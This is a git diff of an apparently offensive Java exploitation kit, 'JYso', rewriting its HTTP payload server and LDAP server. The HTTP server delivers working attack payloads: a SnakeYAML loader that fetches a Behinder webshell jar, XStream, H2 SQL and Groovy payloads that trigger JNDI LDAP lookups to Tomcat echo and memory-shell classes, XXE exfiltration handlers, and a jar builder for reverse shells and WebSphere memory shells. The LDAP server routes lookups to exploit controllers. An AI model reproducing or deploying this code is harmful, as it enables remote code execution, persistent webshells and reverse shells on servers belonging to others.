- serveFileContent(exchange, file, null, null);
- }
- exchange.close();
- }
-
- public static void handlerGroovyRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
- String host = exchange.getRequestURI().getHost();
- String exp = "/TomcatBypass/TomcatEcho";
- String groovyName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
-
- if (groovyName.equalsIgnoreCase("groovyecho")) {
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
-
- String bytes = "class demo {\n" +
- " static void main(){\n" +
- " com.sun.rowset.JdbcRowSetImpl o = new com.sun.rowset.JdbcRowSetImpl();\n" +
- " o.setDataSourceName(\"ldap://" + host + ":1389" + exp + "\");\n" +
- " o.setAutoCommit(true);\n" +
- " }\n" +
- "}\n";
-
- exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
- exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
-
- } else {
- String pa = cwd + File.separator + "data";
- File file = new File(pa + File.separator + groovyName + ".groovy");
-
- serveFileContent(exchange, file, null, null);
-
- }
- exchange.close();
-
- }
-
- public static void handleXXELogRequest(HttpExchange exchange) throws IllegalAccessException, IOException {
- Object exchangeImpl = FieldUtils.readField(exchange, "impl", true);
- Object request = FieldUtils.readField(exchangeImpl, "req", true);
- String startLine = (String) FieldUtils.readField(request, "startLine", true);
-
- System.out.println(ansi().render("@|green [+] XXE Attack Result: |@" + startLine));
- exchange.sendResponseHeaders(200, 0);
- exchange.close();
- }
-
- private static void handleJarRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
- String jarName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
-
- if (jarName.equalsIgnoreCase("behinder3")) {
- byte[] bytes;
- String filename = cwd + File.separator + "data" + File.separator + "behinder3.jar";
- FileReader fileReader = new FileReader(filename, "UTF-8");
- bytes = fileReader.readBytes();
- exchange.sendResponseHeaders(200, bytes.length + 1);
- exchange.getResponseBody().write(bytes);
- } else {
-
- String filename = cwd + File.separator + "data" + File.separator + jarName + ".jar";
- File file = new File(filename);
- if (file.exists()) {
- byte[] bytes;
- FileReader fileReader = new FileReader(filename, "UTF-8");
- bytes = fileReader.readBytes();
- exchange.sendResponseHeaders(200, bytes.length + 1);
- exchange.getResponseBody().write(bytes);
- } else {
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- }
-
- }
- exchange.close();
-
-
- }
-
- private static void handleClassRequest(HttpExchange exchange) throws IOException {
- String path = exchange.getRequestURI().getPath();
- String className = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
- System.out.println(ansi().render("@|green [+] Receive ClassRequest: |@" + className + ".class"));
-
- String pa = cwd + path;
- File file = new File(pa);
-
- if (file.exists()) {
- byte[] bytes = Files.readAllBytes(file.toPath());
- exchange.getResponseHeaders().set("Content-type", "application/octet-stream");
- exchange.sendResponseHeaders(200, file.length());
- exchange.getResponseBody().write(bytes);
-
- System.out.println(ansi().render("@|green [+] 远程类加载成功 |@" + 200));
- System.out.println("-------------------------------------- JNDI Remote Refenrence Links --------------------------------------");
- } else {
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- }
-
- exchange.close();
- }
-
- private static void handleWSDLRequest(HttpExchange exchange) throws Exception {
- String query = exchange.getRequestURI().getQuery();
- Map params = parseQuery(query);
-
- String path = exchange.getRequestURI().getPath().substring(1);
-
- if (path.startsWith("list")) {
- // intended to list directories or read files on server
- String file = params.get("file");
- if (file != null && !file.isEmpty()) {
- String listWsdl =
- "\n" +
- " \n" +
- " %bbb;\n" +
- "]>\n" +
- "\n" +
- " &ddd;\n" +
- "";
-
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
- exchange.sendResponseHeaders(200, listWsdl.getBytes().length);
- exchange.getResponseBody().write(listWsdl.getBytes());
- } else {
- System.out.println(ansi().render("@|red [!] Missing or wrong argument|@"));
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- }
- exchange.close();
-
- } else if (path.startsWith("upload")) {
- String type = params.get("type");
-
- String[] args = null;
- if (type.equalsIgnoreCase("command")) {
- args = new String[]{params.get("cmd")};
- } else if (type.equalsIgnoreCase("dnslog")) {
- args = new String[]{params.get("url")};
- } else if (type.equalsIgnoreCase("reverseshell")) {
- args = new String[]{params.get("ip"), params.get("port")};
- }
-
- String jarName = createJar(type, args);
- if (jarName != null) {
- String uploadWsdl = "";
-
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
- exchange.sendResponseHeaders(200, uploadWsdl.getBytes().length);
- exchange.getResponseBody().write(uploadWsdl.getBytes());
- } else {
- System.out.println(ansi().render("@|red [!] Missing or wrong argument|@"));
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- }
- exchange.close();
- } else if (path.startsWith("http")) {
- String xxhttp = "'>'>%ccc;";
- System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
- exchange.sendResponseHeaders(200, xxhttp.getBytes().length);
- exchange.getResponseBody().write(xxhttp.getBytes());
- exchange.close();
- } else {
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- exchange.close();
- }
- }
-
- private static void serveFileContent(HttpExchange exchange, File file, String headerKey, String headerValue) throws IOException {
- if (file.exists()) {
- byte[] bytes = Files.readAllBytes(file.toPath());
- if (headerKey != null) {
- exchange.getResponseHeaders().set(headerKey, headerValue);
- }
- exchange.sendResponseHeaders(200, file.length() + 1);
- exchange.getResponseBody().write(bytes);
- } else {
- System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
- exchange.sendResponseHeaders(404, 0);
- }
- }
-
- private static Map parseQuery(String query) {
- Map params = new HashMap<>();
-
- try {
- for (String str : query.split("&")) {
- try {
- String[] parts = str.split("=", 2);
- params.put(parts[0], parts[1]);
- } catch (Exception e) {
- // continue
- }
- }
- } catch (Exception e) {
- // continue
- }
-
- return params;
- }
-
- private static String createJar(String type, String... params) throws Exception {
- byte[] bytes;
- String className = "xExportObject";
-
- switch (type.toLowerCase()) {
- case "reverseshell":
- ReverseShellTemplate reverseShellTemplate = new ReverseShellTemplate(params[0], params[1], "xExportObject");
- bytes = reverseShellTemplate.getBytes();
- break;
- case "webspherememshell":
- ClassPool classPool = ClassPool.getDefault();
- CtClass exploitClass = classPool.get("com.feihong.ldap.template.WebsphereMemshellTemplate");
- exploitClass.setName(className);
- exploitClass.detach();
- bytes = exploitClass.toBytecode();
- break;
- default:
- return null;
- }
-
- System.out.println(ansi().render("@|green [+] Name of Class in Jar: |@" + className));
- ByteArrayOutputStream bout = new ByteArrayOutputStream();
- JarOutputStream jarOut = new JarOutputStream(bout);
- jarOut.putNextEntry(new ZipEntry(className + ".class"));
- jarOut.write(bytes);
- jarOut.closeEntry();
- jarOut.close();
- bout.close();
-
- return Utils.getRandomString();
- }
+package com.qi4l.JYso;
+
+import cn.hutool.core.io.file.FileReader;
+import com.qi4l.JYso.gadgets.Config.Config;
+import com.qi4l.JYso.gadgets.utils.Utils;
+import com.qi4l.JYso.template.ReverseShellTemplate;
+import com.sun.net.httpserver.HttpExchange;
+import com.sun.net.httpserver.HttpServer;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.lang3.reflect.FieldUtils;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+import java.io.ByteArrayOutputStream;
+import java.io.File;
+import java.io.IOException;
+import java.net.InetSocketAddress;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.jar.JarOutputStream;
+import java.util.zip.ZipEntry;
+
+import static org.fusesource.jansi.Ansi.ansi;
+
+@SuppressWarnings("HttpUrlsUsage")
+public class HTTPServer {
+ private static final Logger log = LogManager.getLogger(HTTPServer.class);
+ public static boolean isRunning = false;
+ public static String cwd = System.getProperty("user.dir");
+
+ public static void start() throws IOException {
+
+ HttpServer httpServer = HttpServer.create(new InetSocketAddress(Config.httpPort), 0);
+ httpServer.createContext("/", httpExchange -> {
+ try {
+ System.out.println(ansi().render("@|green [+]|@ New HTTP Request From >>" + httpExchange.getRemoteAddress() + " " + httpExchange.getRequestURI()));
+
+ String qi = String.valueOf(httpExchange.getRequestURI());
+
+
+ if (qi.contains("setPathAlias")) {
+ Config.BCEL1 = qi.substring(qi.indexOf("=") + 1);
+ System.out.println(ansi().render("@|green [+]|@ 获取参数成功 >> " + Config.BCEL1));
+ } else if (qi.contains("setRoute")) {
+ Config.ROUTE = qi.substring(qi.indexOf("=") + 1);
+ System.out.println(ansi().render("@|green [+]|@ 获取路由成功 >> " + Config.ROUTE));
+ }
+
+ String path = httpExchange.getRequestURI().getPath();
+ if (path.endsWith(".class")) {
+ handleClassRequest(httpExchange);
+ } else if (path.endsWith(".wsdl")) {
+ handleWSDLRequest(httpExchange);
+ } else if (path.endsWith(".jar")) {
+ handleJarRequest(httpExchange);
+ } else if (path.startsWith("/xxelog")) {
+ handleXXELogRequest(httpExchange);
+ } else if (path.endsWith(".sql")) {
+ handleSQLRequest(httpExchange);
+ } else if (path.endsWith(".groovy")) {
+ handlerGroovyRequest(httpExchange);
+ } else if (path.endsWith(".xml")) {
+ handleXMLRequest(httpExchange);
+ } else if (path.endsWith(".txt")) {
+ handleTXTRequest(httpExchange);
+ } else if (path.endsWith(".yml")) {
+ handleYmlRequest(httpExchange);
+ } else {
+ handleFileRequest(httpExchange);
+ }
+ } catch (Exception e) {
+ log.error("e: ", e);
+ }
+ });
+
+ httpServer.setExecutor(null);
+ httpServer.start();
+ isRunning = true;
+ System.out.println(ansi().render("@|green [+]|@ HTTP Server Start Listening on >> " + Config.httpPort + "..."));
+ }
+
+ private static void handleFileRequest(HttpExchange exchange) throws Exception {
+ System.out.println("[-] 请求的后缀不对");
+ String path = exchange.getRequestURI().getPath();
+ String filename = cwd + File.separator + "data" + File.separator + path.substring(path.lastIndexOf("/") + 1);
+ File file = new File(filename);
+ serveFileContent(exchange, file, null, null);
+ exchange.close();
+
+ }
+
+ private static void handleYmlRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+// String host = exchange.getRequestURI().getHost();
+ String YamlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+ String bytes = "!!javax.script.ScriptEngineManager [\n" +
+ " !!java.net.URLClassLoader [[\n" +
+ " !!java.net.URL [\"http://" + Config.ip + ":" + Config.httpPort + "/behinder3.jar\"]\n" +
+ " ]]\n" +
+ "]\n";
+
+ if (YamlName.equalsIgnoreCase("snake")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+// exchange.getResponseHeaders().set("Content-type","application/octet-stream");
+ exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
+// exchange.sendResponseHeaders(200, yaml.getObject().length + 1);
+ exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
+// exchange.getResponseBody().write(yaml.getObject("UTF-8"));
+ } else {
+ String pa = cwd + File.separator + "data";
+ File file = new File(pa + File.separator + YamlName + ".yml");
+ serveFileContent(exchange, file, "Content-type", "application/octet-stream");
+
+ }
+ exchange.close();
+ }
+
+ public static void handleTXTRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+ String txtname = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+ if (txtname.equalsIgnoreCase("isok")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+ byte[] bytes = "success!".getBytes();
+ exchange.getResponseHeaders().set("Content-type", "application/octet-stream");
+ exchange.sendResponseHeaders(200, bytes.length + 1);
+ exchange.getResponseBody().write(bytes);
+ } else {
+ String pa = cwd + File.separator + "data";
+ File file = new File(pa + File.separator + txtname + ".txt");
+
+ serveFileContent(exchange, file, "Content-type", "application/octet-stream");
+ }
+ exchange.close();
+ }
+
+ public static void handleXMLRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+// String host = exchange.getRequestURI().getHost();
+ String xmlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+ String bytes = "\n \n";
+ String xstream = "\n" +
+ " \n" +
+ " 0\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " false\n" +
+ " 0\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " 1008\n" +
+ " true\n" +
+ " 1000\n" +
+ " 0\n" +
+ " 2\n" +
+ " 0\n" +
+ " 0\n" +
+ " 0\n" +
+ " true\n" +
+ " 1004\n" +
+ " false\n" +
+ " ldap://" + Config.ip + ":1389/basic/TomcatMemShell3\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " -1\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " com.sun.rowset.JdbcRowSetImpl\n" +
+ " getDatabaseMetaData\n" +
+ " \n" +
+ " \n" +
+ " foo\n" +
+ " \n" +
+ " foo\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " false\n" +
+ " 0\n" +
+ " 0\n" +
+ " false\n" +
+ " \n" +
+ " false\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " 0\n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ " \n" +
+ "";
+
+ if (xmlName.equals("a")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+
+
+ exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
+ exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
+ } else if (xmlName.equals("x")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+ exchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
+ exchange.sendResponseHeaders(200, xstream.getBytes().length + 1);
+ exchange.getResponseBody().write(xstream.getBytes(StandardCharsets.UTF_8));
+
+ } else {
+ String pa = cwd + File.separator + "data";
+ File file = new File(pa + File.separator + xmlName + ".xml");
+
+ serveFileContent(exchange, file, "Content-Type", "application/xml; charset=utf-8");
+
+ }
+ exchange.close();
+
+ }
+
+ public static void handleSQLRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+ String host = exchange.getRequestURI().getHost();
+ String sqlName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+
+ if (sqlName.equalsIgnoreCase("echo")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+
+ String name = String.valueOf(System.nanoTime());
+ String bytes = "CREATE ALIAS " + name + " AS CONCAT('void ex()throws Exception" +
+ "{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");',' 'o.setAutoCommit(\"true\");,'}');" +
+ "CALL " + name + "();\"}";
+ exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
+ exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
+ } else if (sqlName.equalsIgnoreCase("inject")) {
+ System.out.println("@|green Response Code: |@" + 200);
+
+ String name = String.valueOf(System.nanoTime());
+ String bytes = "CREATE ALIAS " + name + " AS CONCAT('void ex()throws Exception" +
+ "{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap:// + host + :1389/inject.class\");',' 'o.setAutoCommit(\"true\");,'}');" +
+ "CALL " + name + "();\"}";
+ exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
+ exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
+
+ } else {
+
+ String pa = cwd + File.separator + "data";
+ File file = new File(pa + File.separator + sqlName + ".sql");
+
+ serveFileContent(exchange, file, null, null);
+ }
+ exchange.close();
+ }
+
+ public static void handlerGroovyRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+ String host = exchange.getRequestURI().getHost();
+ String exp = "/TomcatBypass/TomcatEcho";
+ String groovyName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+
+ if (groovyName.equalsIgnoreCase("groovyecho")) {
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+
+ String bytes = "class demo {\n" +
+ " static void main(){\n" +
+ " com.sun.rowset.JdbcRowSetImpl o = new com.sun.rowset.JdbcRowSetImpl();\n" +
+ " o.setDataSourceName(\"ldap://" + host + ":1389" + exp + "\");\n" +
+ " o.setAutoCommit(true);\n" +
+ " }\n" +
+ "}\n";
+
+ exchange.sendResponseHeaders(200, bytes.getBytes().length + 1);
+ exchange.getResponseBody().write(bytes.getBytes(StandardCharsets.UTF_8));
+
+ } else {
+ String pa = cwd + File.separator + "data";
+ File file = new File(pa + File.separator + groovyName + ".groovy");
+
+ serveFileContent(exchange, file, null, null);
+
+ }
+ exchange.close();
+
+ }
+
+ public static void handleXXELogRequest(HttpExchange exchange) throws IllegalAccessException, IOException {
+ Object exchangeImpl = FieldUtils.readField(exchange, "impl", true);
+ Object request = FieldUtils.readField(exchangeImpl, "req", true);
+ String startLine = (String) FieldUtils.readField(request, "startLine", true);
+
+ System.out.println(ansi().render("@|green [+] XXE Attack Result: |@" + startLine));
+ exchange.sendResponseHeaders(200, 0);
+ exchange.close();
+ }
+
+ private static void handleJarRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+ String jarName = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+
+ if (jarName.equalsIgnoreCase("behinder3")) {
+ byte[] bytes;
+ String filename = cwd + File.separator + "data" + File.separator + "behinder3.jar";
+ FileReader fileReader = new FileReader(filename, "UTF-8");
+ bytes = fileReader.readBytes();
+ exchange.sendResponseHeaders(200, bytes.length + 1);
+ exchange.getResponseBody().write(bytes);
+ } else {
+
+ String filename = cwd + File.separator + "data" + File.separator + jarName + ".jar";
+ File file = new File(filename);
+ if (file.exists()) {
+ byte[] bytes;
+ FileReader fileReader = new FileReader(filename, "UTF-8");
+ bytes = fileReader.readBytes();
+ exchange.sendResponseHeaders(200, bytes.length + 1);
+ exchange.getResponseBody().write(bytes);
+ } else {
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ }
+
+ }
+ exchange.close();
+
+
+ }
+
+ private static void handleClassRequest(HttpExchange exchange) throws IOException {
+ String path = exchange.getRequestURI().getPath();
+ String className = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
+ System.out.println(ansi().render("@|green [+] Receive ClassRequest: |@" + className + ".class"));
+
+ String pa = cwd + path;
+ File file = new File(pa);
+
+ if (file.exists()) {
+ byte[] bytes = Files.readAllBytes(file.toPath());
+ exchange.getResponseHeaders().set("Content-type", "application/octet-stream");
+ exchange.sendResponseHeaders(200, file.length());
+ exchange.getResponseBody().write(bytes);
+
+ System.out.println(ansi().render("@|green [+] 远程类加载成功 |@" + 200));
+ System.out.println("-------------------------------------- JNDI Remote Refenrence Links --------------------------------------");
+ } else {
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ }
+
+ exchange.close();
+ }
+
+ private static void handleWSDLRequest(HttpExchange exchange) throws Exception {
+ String query = exchange.getRequestURI().getQuery();
+ Map params = parseQuery(query);
+
+ String path = exchange.getRequestURI().getPath().substring(1);
+
+ if (path.startsWith("list")) {
+ // intended to list directories or read files on server
+ String file = params.get("file");
+ if (file != null && !file.isEmpty()) {
+ String listWsdl =
+ "\n" +
+ " \n" +
+ " %bbb;\n" +
+ "]>\n" +
+ "\n" +
+ " &ddd;\n" +
+ "";
+
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+ exchange.sendResponseHeaders(200, listWsdl.getBytes().length);
+ exchange.getResponseBody().write(listWsdl.getBytes());
+ } else {
+ System.out.println(ansi().render("@|red [!] Missing or wrong argument|@"));
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ }
+ exchange.close();
+
+ } else if (path.startsWith("upload")) {
+ String type = params.get("type");
+
+ String[] args = null;
+ if (type.equalsIgnoreCase("command")) {
+ args = new String[]{params.get("cmd")};
+ } else if (type.equalsIgnoreCase("dnslog")) {
+ args = new String[]{params.get("url")};
+ } else if (type.equalsIgnoreCase("reverseshell")) {
+ args = new String[]{params.get("ip"), params.get("port")};
+ }
+
+ String jarName = createJar(type, args);
+ if (jarName != null) {
+ String uploadWsdl = "";
+
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+ exchange.sendResponseHeaders(200, uploadWsdl.getBytes().length);
+ exchange.getResponseBody().write(uploadWsdl.getBytes());
+ } else {
+ System.out.println(ansi().render("@|red [!] Missing or wrong argument|@"));
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ }
+ exchange.close();
+ } else if (path.startsWith("http")) {
+ String xxhttp = "'>'>%ccc;";
+ System.out.println(ansi().render("@|green [+] Response Code: |@" + 200));
+ exchange.sendResponseHeaders(200, xxhttp.getBytes().length);
+ exchange.getResponseBody().write(xxhttp.getBytes());
+ exchange.close();
+ } else {
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ exchange.close();
+ }
+ }
+
+ private static void serveFileContent(HttpExchange exchange, File file, String headerKey, String headerValue) throws IOException {
+ if (file.exists()) {
+ byte[] bytes = Files.readAllBytes(file.toPath());
+ if (headerKey != null) {
+ exchange.getResponseHeaders().set(headerKey, headerValue);
+ }
+ exchange.sendResponseHeaders(200, file.length() + 1);
+ exchange.getResponseBody().write(bytes);
+ } else {
+ System.out.println(ansi().render("@|red [!] Response Code: |@" + 404));
+ exchange.sendResponseHeaders(404, 0);
+ }
+ }
+
+ private static Map parseQuery(String query) {
+ Map params = new HashMap<>();
+
+ try {
+ for (String str : query.split("&")) {
+ try {
+ String[] parts = str.split("=", 2);
+ params.put(parts[0], parts[1]);
+ } catch (Exception e) {
+ // continue
+ }
+ }
+ } catch (Exception e) {
+ // continue
+ }
+
+ return params;
+ }
+
+ private static String createJar(String type, String... params) throws Exception {
+ byte[] bytes;
+ String className = "xExportObject";
+
+ switch (type.toLowerCase()) {
+ case "reverseshell":
+ ReverseShellTemplate reverseShellTemplate = new ReverseShellTemplate(params[0], params[1], "xExportObject");
+ bytes = reverseShellTemplate.getBytes();
+ break;
+ case "webspherememshell":
+ ClassPool classPool = ClassPool.getDefault();
+ CtClass exploitClass = classPool.get("com.feihong.ldap.template.WebsphereMemshellTemplate");
+ exploitClass.setName(className);
+ exploitClass.detach();
+ bytes = exploitClass.toBytecode();
+ break;
+ default:
+ return null;
+ }
+
+ System.out.println(ansi().render("@|green [+] Name of Class in Jar: |@" + className));
+ ByteArrayOutputStream bout = new ByteArrayOutputStream();
+ JarOutputStream jarOut = new JarOutputStream(bout);
+ jarOut.putNextEntry(new ZipEntry(className + ".class"));
+ jarOut.write(bytes);
+ jarOut.closeEntry();
+ jarOut.close();
+ bout.close();
+
+ return Utils.getRandomString();
+ }
}
\ No newline at end of file
diff --git a/src/main/java/com/qi4l/JYso/LdapServer.java b/src/main/java/com/qi4l/JYso/LdapServer.java
index e9a8873..be81ea6 100644
--- a/src/main/java/com/qi4l/JYso/LdapServer.java
+++ b/src/main/java/com/qi4l/JYso/LdapServer.java
@@ -1,125 +1,127 @@
-package com.qi4l.JYso;
-
-import com.qi4l.JYso.controllers.LdapController;
-import com.qi4l.JYso.controllers.LdapMapping;
-import com.qi4l.JYso.controllers.utils.JNDIUtils;
-import com.qi4l.JYso.gadgets.Config.Config;
-import com.unboundid.ldap.listener.InMemoryDirectoryServer;
-import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
-import com.unboundid.ldap.listener.InMemoryListenerConfig;
-import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
-import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
-import org.apache.logging.log4j.LogManager;
-import org.apache.logging.log4j.Logger;
-import org.reflections.Reflections;
-
-import javax.net.ServerSocketFactory;
-import javax.net.SocketFactory;
-import javax.net.ssl.SSLSocketFactory;
-import java.lang.reflect.Constructor;
-import java.net.InetAddress;
-import java.util.Set;
-import java.util.TreeMap;
-
-import static com.qi4l.JYso.gadgets.Config.Config.*;
-import static com.qi4l.JYso.gadgets.utils.Utils.base64Decode;
-import static org.fusesource.jansi.Ansi.ansi;
-
-
-public class LdapServer extends InMemoryOperationInterceptor {
-
- private static final Logger log = LogManager.getLogger(LdapServer.class);
- public static TreeMap routes = new TreeMap<>();
-
- public LdapServer() throws Exception {
-
- //find all classes annotated with @LdapMapping
- Set> controllers = new Reflections(this.getClass().getPackage().getName())
- .getTypesAnnotatedWith(LdapMapping.class);
-
- //instantiate them and store in the routes map
- for (Class> controller : controllers) {
- Constructor> cons = controller.getConstructor();
- LdapController instance = (LdapController) cons.newInstance();
- String[] mappings = controller.getAnnotation(LdapMapping.class).uri();
- for (String mapping : mappings) {
- if (mapping.startsWith("/")) {
- mapping = mapping.substring(1); //remove first forward slash
- routes.put(mapping, instance);
- }
- }
- }
- }
-
- public static void start() {
- try {
- InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig("dc=example,dc=com");
-
- serverConfig.setListenerConfigs(new InMemoryListenerConfig(
- "listen",
- InetAddress.getByName("0.0.0.0"),
- Config.ldapPort,
- ServerSocketFactory.getDefault(),
- SocketFactory.getDefault(),
- (SSLSocketFactory) SSLSocketFactory.getDefault()));
-
- if (!USER.isEmpty() || !PASSWD.isEmpty()) {
- serverConfig.addAdditionalBindCredentials(USER, PASSWD);
- }
-
- //添加操作拦截器
- //将提供的操作拦截器添加到操作拦截器列表中,该列表可用于在请求被内存目录服务器处理之前转换请求,和/或在响应返回给客户端之前转换响应。
- serverConfig.addInMemoryOperationInterceptor(new LdapServer());
- InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);
- ds.startListening();
- System.out.println(ansi().render("@|green [+]|@ LDAP Server Start Listening on >> " + Config.ldapPort + "..."));
- } catch (Exception e) {
- log.error("e: ", e);
- }
- }
-
- @Override
- public void processSearchResult(InMemoryInterceptedSearchResult result) {
- String base;
- if (!ROUTE.isEmpty()) {
- base = ROUTE;
- } else {
- base = result.getRequest().getBaseDN();
- }
- try {
- if (!AESkey.equals("123")) {
- base = base64Decode(base);
- base = JNDIUtils.decrypt(base, AESkey);
- }
- } catch (Exception ignored) {
-
- }
-
- //收到ldap请求
- //System.out.println(ansi().render("@|green [+] Received LDAP Query : |@" + base));
- LdapController controller = null;
- //find controller
- //根据请求的路径从route中匹配相应的controller
- for (String key : routes.keySet()) {
- //compare using wildcard at the end
- if (base.toLowerCase().startsWith(key)) {
- controller = routes.get(key);
- break;
- }
- }
-
-
- if (controller == null) {
- System.out.println(ansi().render("@|red [!] Invalid LDAP Query >> |@" + base));
- return;
- }
-
- try {
- //从控制器中进行返回
- controller.process(base);
- controller.sendResult(result, base);
- } catch (Exception e1) {
- System.out.println(ansi().render("@|red [!] Exception >> |@" + e1.getMessage()));
- }
- }
+package com.qi4l.JYso;
+
+import com.qi4l.JYso.controllers.LdapController;
+import com.qi4l.JYso.controllers.LdapMapping;
+import com.qi4l.JYso.controllers.utils.JNDIUtils;
+import com.qi4l.JYso.gadgets.Config.Config;
+import com.unboundid.ldap.listener.InMemoryDirectoryServer;
+import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
+import com.unboundid.ldap.listener.InMemoryListenerConfig;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.reflections.Reflections;
+
+import javax.net.ServerSocketFactory;
+import javax.net.SocketFactory;
+import javax.net.ssl.SSLSocketFactory;
+import java.lang.reflect.Constructor;
+import java.net.InetAddress;
+import java.util.Set;
+import java.util.TreeMap;
+
+import static com.qi4l.JYso.gadgets.Config.Config.*;
+import static com.qi4l.JYso.gadgets.utils.Utils.base64Decode;
+import static org.fusesource.jansi.Ansi.ansi;
+
+
+public class LdapServer extends InMemoryOperationInterceptor {
+
+ private static final Logger log = LogManager.getLogger(LdapServer.class);
+ public static TreeMap routes = new TreeMap<>();
+ public static boolean isRunning = false;
+
+ public LdapServer() throws Exception {
+
+ //find all classes annotated with @LdapMapping
+ Set> controllers = new Reflections(this.getClass().getPackage().getName())
+ .getTypesAnnotatedWith(LdapMapping.class);
+
+ //instantiate them and store in the routes map
+ for (Class> controller : controllers) {
+ Constructor> cons = controller.getConstructor();
+ LdapController instance = (LdapController) cons.newInstance();
+ String[] mappings = controller.getAnnotation(LdapMapping.class).uri();
+ for (String mapping : mappings) {
+ if (mapping.startsWith("/")) {
+ mapping = mapping.substring(1); //remove first forward slash
+ routes.put(mapping, instance);
+ }
+ }
+ }
+ }
+
+ public static void start() {
+ try {
